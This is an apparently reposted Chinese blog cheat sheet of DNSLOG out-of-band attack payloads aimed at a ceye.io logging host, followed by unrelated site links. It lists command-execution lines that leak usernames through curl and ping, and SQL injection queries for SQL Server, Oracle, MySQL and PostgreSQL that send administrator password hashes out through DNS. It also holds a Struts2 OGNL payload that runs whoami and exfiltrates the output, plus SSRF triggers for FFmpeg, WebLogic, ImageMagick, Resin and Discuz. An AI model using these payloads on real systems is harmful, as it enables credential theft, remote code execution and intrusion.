mysql dnslog_DNSLOG用法

mysql dnslog_DNSLOG用法0x00CommandE nix curlhttp ip port b182oj ceye io whoami ping whoami ip port b182oj ceye ioii windowsping USERNAME b182oj ceye io0x01SQLInj SQLServerDEC hostvarch

0x00 Command Execution

i. *nix:

curl http://ip.port.b182oj.ceye.io/`whoami`

ping `whoami`.ip.port.b182oj.ceye.io

ii. windows

ping %USERNAME%.b182oj.ceye.io

0x01 SQL Injection

i. SQL Server

DECLARE @host varchar(1024);

SELECT @host=(SELECT TOP 1

master.dbo.fn_varbintohexstr(password_hash)

FROM sys.sql_logins WHERE name=’sa’)

+’.ip.port.b182oj.ceye.io’;

EXEC(‘master..xp_dirtree

“\\’+@host+’\foobar$”‘);

ii. Oracle

SELECT UTL_INADDR.GET_HOST_ADDRESS(‘ip.port.b182oj.ceye.io’);

SELECT UTL_HTTP.REQUEST(‘http://ip.port.b182oj.ceye.io/oracle’) FROM DUAL;

SELECT HTTPURITYPE(‘http://ip.port.b182oj.ceye.io/oracle’).GETCLOB() FROM DUAL;

SELECT DBMS_LDAP.INIT((‘oracle.ip.port.b182oj.ceye.io’,80) FROM DUAL;

SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name=’SYS’)||’.ip.port.b182oj.ceye.io’,80) FROM DUAL;

iii. MySQL

SELECT LOAD_FILE(CONCAT(‘\\\\’,(SELECT password FROM mysql.user WHERE user=’root’ LIMIT 1),’.mysql.ip.port.b182oj.ceye.io\\abc’));

iv. PostgreSQL

DROP TABLE IF EXISTS table_output;

CREATE TABLE table_output(content text);

CREATE OR REPLACE FUNCTION temp_function()

RETURNS VOID AS $

DECLARE exec_cmd TEXT;

DECLARE query_result TEXT;

BEGIN

SELECT INTO query_result (SELECT passwd

FROM pg_shadow WHERE usename=’postgres’);

exec_cmd := E’COPY table_output(content)

FROM E\’\\\\\\\\’||query_result||E’.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\”;

EXECUTE exec_cmd;

END;

$ LANGUAGE plpgsql SECURITY DEFINER;

SELECT temp_function();

0x02 XML Entity Injection

%remote;]>

0x03 Others

i. Struts2

xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}

xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{‘whoami’})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d”http://ip.port.b182oj.ceye.io/result%3d”.concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod(“GET”),%23http.connect(),%23http.getInputStream()}

ii. FFMpeg

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://ip.port.b182oj.ceye.io

#EXT-X-ENDLIST

iii. Weblogic

xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

iv. ImageMagick

push graphic-context

viewbox 0 0 640 480

fill ‘url(http://ip.port.b182oj.ceye.io)’

pop graphic-context

v. Resin

xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf

vi. Discuz

http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/230200.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月16日 下午2:54
下一篇 2026年3月16日 下午2:54


相关推荐

  • 访问数据库使用redis作为mysql的缓存(redis和mysql结合)

    访问数据库使用redis作为mysql的缓存(redis和mysql结合)首先声明一下,我是在一个SSM项目的基础上进行优化的,所以就不进行基础的介绍了。下面我也补充一些知识点:redis:内存型数据库,有持久化功能,具备分布式特性,可靠性高,适用于对读写效率要求都很高,数据处理业务复杂和对安全性要求较高的系统(如新浪微博的计数和微博发布部分系统,对数据安全性、读写要求都很高)。缓存机制说明:所有的查询结果都放进了缓存,也就是把MySQL查询的结果放…

    2022年6月17日
    38
  • 用php搭建公众号服务器,如何快速给自己的微信公众号搭建自己的后台服务端

    用php搭建公众号服务器,如何快速给自己的微信公众号搭建自己的后台服务端想要快速给自己的微信公众号搭建自己的后台服务端 该怎么办呢 那么的呢 下面是小编收集整理的 希望对大家有帮助 快速给自己的微信公众号搭建自己的后台服务端的方法工具 原料一个申请并通过审核的微信公众号一个申请并通过审核的新浪云平台账号方法 步骤在新浪云平台点击创建新应用 弹出的页面填入二级域名 应用名称和验证码 开发语言点选 php 选项卡 在全部应用和框架中找到并选择 weiphp 然后点击页面底端的

    2026年3月18日
    2
  • windows 域名绑定ip

    windows 域名绑定ip有时候访问网站会出现网站拒绝访问的情况 如果知道这个网站的 IP 我们可以尝试用域名绑定 ip 的做法来解决

    2026年3月19日
    3
  • 浅谈辄止_java forkjoinpool

    浅谈辄止_java forkjoinpool文章目录一、ForkJoin是什么?它能用来实现什么功能?二、ForkJoin的实现原理三、ForkJoin的简单使用一、ForkJoin是什么?它能用来实现什么功能?二、ForkJoin的实现原理三、ForkJoin的简单使用在这里插入代码片…

    2026年2月2日
    7
  • springMVC3学习(六)–SimpleFormController

    springMVC3学习(六)–SimpleFormController

    2021年12月2日
    44
  • 学生成绩管理系统【C语言程序设计】

    一、功能实现:0、浏览学生信息1、输入学生信息2、增加学生信息3、修改学生信息4、删除学生信息5、按学号查询6

    2022年4月9日
    42

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号